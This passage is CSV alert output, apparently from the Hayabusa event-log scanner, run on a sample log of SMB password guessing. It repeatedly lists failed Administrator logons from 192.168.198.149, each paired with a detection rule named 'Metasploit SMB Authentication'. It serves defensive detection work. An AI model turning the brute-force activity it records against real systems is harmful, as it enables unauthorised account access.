Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
